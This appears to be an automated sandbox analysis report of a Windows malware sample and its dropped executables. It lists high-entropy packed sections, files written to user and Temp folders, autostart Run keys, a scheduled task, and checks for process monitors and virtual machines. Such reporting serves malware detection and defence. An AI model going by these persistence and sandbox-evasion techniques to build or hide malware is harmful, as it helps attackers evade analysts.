Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: real checksum: 0x1d050c should be: 0x1d89c1
Source: fa55e7c5ed.exe.11.dr	Static PE information: real checksum: 0x43dc27 should be: 0x44439c
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x1d050c should be: 0x1d89c1
Source: file.exe	Static PE information: real checksum: 0x1b99be should be: 0x1c31b7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: wkrmqwho
Source: file.exe	Static PE information: section name: fzxxpvmm
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: brwftgiw
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: oajgfsxl
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: bgrcdjci
Source: random[1].exe.0.dr	Static PE information: section name: aezraviv
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: brwftgiw
Source: skotes.exe.9.dr	Static PE information: section name: oajgfsxl
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: .rsrc
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: .idata
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: bgrcdjci
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: aezraviv
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: ackgsmri
Source: random[1].exe.11.dr	Static PE information: section name: nodwasaq
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 0718eb7837.exe.11.dr	Static PE information: section name:
Source: 0718eb7837.exe.11.dr	Static PE information: section name: .idata
Source: 0718eb7837.exe.11.dr	Static PE information: section name:
Source: 0718eb7837.exe.11.dr	Static PE information: section name: ackgsmri
Source: 0718eb7837.exe.11.dr	Static PE information: section name: nodwasaq
Source: 0718eb7837.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: wkrmqwho
Source: random[1].exe0.11.dr	Static PE information: section name: fzxxpvmm
Source: random[1].exe0.11.dr	Static PE information: section name: .taggant
Source: aedbd2e320.exe.11.dr	Static PE information: section name:
Source: aedbd2e320.exe.11.dr	Static PE information: section name: .idata
Source: aedbd2e320.exe.11.dr	Static PE information: section name:
Source: aedbd2e320.exe.11.dr	Static PE information: section name: wkrmqwho
Source: aedbd2e320.exe.11.dr	Static PE information: section name: fzxxpvmm
Source: aedbd2e320.exe.11.dr	Static PE information: section name: .taggant
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: random[2].exe.11.dr	Static PE information: section name: jajeyrhy
Source: random[2].exe.11.dr	Static PE information: section name: xqskffqo
Source: random[2].exe.11.dr	Static PE information: section name: .taggant
Source: 2aff342b40.exe.11.dr	Static PE information: section name:
Source: 2aff342b40.exe.11.dr	Static PE information: section name: .idata
Source: 2aff342b40.exe.11.dr	Static PE information: section name: jajeyrhy
Source: 2aff342b40.exe.11.dr	Static PE information: section name: xqskffqo
Source: 2aff342b40.exe.11.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A0D91C push ecx; ret	11_2_00A0D92F
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA9BBF push edi; retf	14_3_05EA9BCF

Source: file.exe	Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: entropy: 7.977427929037122
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: brwftgiw entropy: 7.953765589364572
Source: random[1].exe.0.dr	Static PE information: section name: bgrcdjci entropy: 7.955794743313823
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.977427929037122
Source: skotes.exe.9.dr	Static PE information: section name: brwftgiw entropy: 7.953765589364572
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: bgrcdjci entropy: 7.955794743313823
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.9810982340478365
Source: random[1].exe.11.dr	Static PE information: section name: ackgsmri entropy: 7.9522925372316715
Source: 0718eb7837.exe.11.dr	Static PE information: section name: entropy: 7.9810982340478365
Source: 0718eb7837.exe.11.dr	Static PE information: section name: ackgsmri entropy: 7.9522925372316715
Source: random[1].exe0.11.dr	Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: aedbd2e320.exe.11.dr	Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: random[2].exe.11.dr	Static PE information: section name: entropy: 7.7983145671747005
Source: 2aff342b40.exe.11.dr	Static PE information: section name: entropy: 7.7983145671747005

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECFIDGCBF.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsKECFIDGCBF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECFIDGCBF.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsKECFIDGCBF.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	File opened: HKEY_CURRENT_USER\Software\Wine
